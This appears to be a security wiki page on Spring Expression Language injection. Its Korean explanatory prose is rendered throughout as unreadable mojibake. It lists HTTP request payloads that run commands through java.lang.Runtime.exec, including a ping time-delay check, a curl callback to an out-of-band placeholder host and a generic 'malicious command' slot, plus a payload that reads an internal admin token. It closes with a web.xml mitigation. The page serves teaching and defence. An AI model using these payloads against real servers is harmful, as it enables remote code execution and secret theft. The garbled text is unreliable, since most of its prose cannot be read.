EL(Expression Language) Injection

๐Ÿ” Introduction

EL(Expression Language) Injection์€ Expression์„ ์ฒ˜๋ฆฌํ•˜๋Š” EL interpreter์— ๋Œ€ํ•œ Injection ๊ณต๊ฒฉ์œผ๋กœ SSTI, OGNL Injection๊ณผ ์œ ์‚ฌํ•จ์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

๋งŒ์•ฝ Spring์—์„œ Expression์„ ํ†ตํ•ด ์•„๋ž˜์™€ ๊ฐ™์ด ์ฒ˜๋ฆฌํ•˜๊ณ  ์žˆ๋‹ค๋ฉด param.msg ์ฆ‰ data๋ž€ ์ด๋ฆ„์˜ ํŒŒ๋ผ๋ฏธํ„ฐ๋Š” Expression Language๋กœ ์ฒ˜๋ฆฌ๋˜๊ธฐ ๋–„๋ฌธ์— Injection์„ ํ†ตํ•ด์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ์›ํ•˜๋Š” ๊ตฌ๋ฌธ์„ ์ฃผ์ž…ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

1
<spring:message code="${param.data}" />
1
2
GET /log?data=${param.test}&test=INJECTION HTTP/1.1
Host: localhost

EL Injection์— ๋Œ€ํ•œ ํƒ์ง€๋Š” ๋ณดํ†ต SSTI์™€ ์œ ์‚ฌํ•œ ํ˜•ํƒœ๋กœ ์ง„ํ–‰๋˜๋ฉฐ, ์ด์™ธ์—๋„ ์ง์ ‘ Expression ๊ตฌ๋ฌธ์„ ์ „์†กํ•˜์—ฌ ์„œ๋ฒ„๊ฐ€ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐฉ์‹์„ ์ฒดํฌํ•˜๋Š” ํ˜•ํƒœ๋กœ ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค.

1
2
GET /log?data=${T(java.lang.Runtime).getRuntime().exec("COMMANDS")} HTTP/1.1
Host: localhost

Time-Based

1
2
GET /log?data=${T(java.lang.Runtime).getRuntime().exec("ping -c 5 127.0.0.1")} HTTP/1.1
Host: localhost

ping ์ฒดํฌ ์‹œ 5ํšŒ ์ฒดํฌํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์•ฝ 5์ดˆ์˜ ๋”œ๋ ˆ์ด๊ฐ€ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.

OAST-Based

1
2
GET /log?data=${T(java.lang.Runtime).getRuntime().exec("curl <OAST-SERVICE>")} HTTP/1.1
Host: localhost

OAST-SERVICE๋กœ DNS Query์™€ HTTP Request๊ฐ€ ๋„์ฐฉํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•˜์—ฌ ์ฒดํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Exploitation

RCE

Expression์€ ์–ธ์–ด์— ๋”ฐ๋ผ ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต Server-Side Application์—์„œ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ๊ณผ ์œ ์‚ฌํ•œ ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ ๋ช…๋ น์„ ์ „๋‹ฌํ•˜๊ณ  ์‹คํ–‰ํ•˜์—ฌ ์„œ๋ฒ„๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
GET /log?data=${T(java.lang.Runtime).getRuntime().exec("์•…์˜์ ์ธ ๋ช…๋ น ์‹คํ–‰")} HTTP/1.1
Host: localhost

RCE Tirkc์€ SSTI์—์„œ Expression์— ๋Œ€ํ•ด ๋ช…์‹œ๋˜์–ด ์žˆ์œผ๋‹ˆ ์ฐธ๊ณ  ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.

Infomation Disclosure

Expression์„ ํ†ตํ•ด Object๋ฅผ ์ฐธ์กฐํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ํ†ต์ œ๋œ Object ๋‚ด๋ถ€์˜ ๊ฐ’์„ ํ˜ธ์ถœํ•˜์—ฌ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
GET /log?data=${admin.internalToken} HTTP/1.1
Host: localhost

๐Ÿ›ก Defensive techniques

Basic

๊ธฐ๋ณธ์ ์ธ ๋Œ€์‘๋ฐฉ์•ˆ์€ SSTI์™€ ๋™์ผํ•ฉ๋‹ˆ๋‹ค.

https://www.hahwul.com/cullinan/ssti/#-defensive-techniques

SePL

SePL(Spring Expression Language)์˜ ๊ฒฝ์šฐ Spring framework์˜ web.xml์— springJspExpressionSupport๋ฅผ false๋กœ ์ง€์ •ํ•˜์—ฌ ๊ธฐ๋ณธ์ ์ธ SePL Injection์„ ์˜ˆ๋ฐฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
3
4
5
<context-param>
  <description>Spring Expression Language Support</description>
  <param-name>springJspExpressionSupport</param-name>
  <param-value>false</param-value>
</context-param>

๐Ÿ“š Articles

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0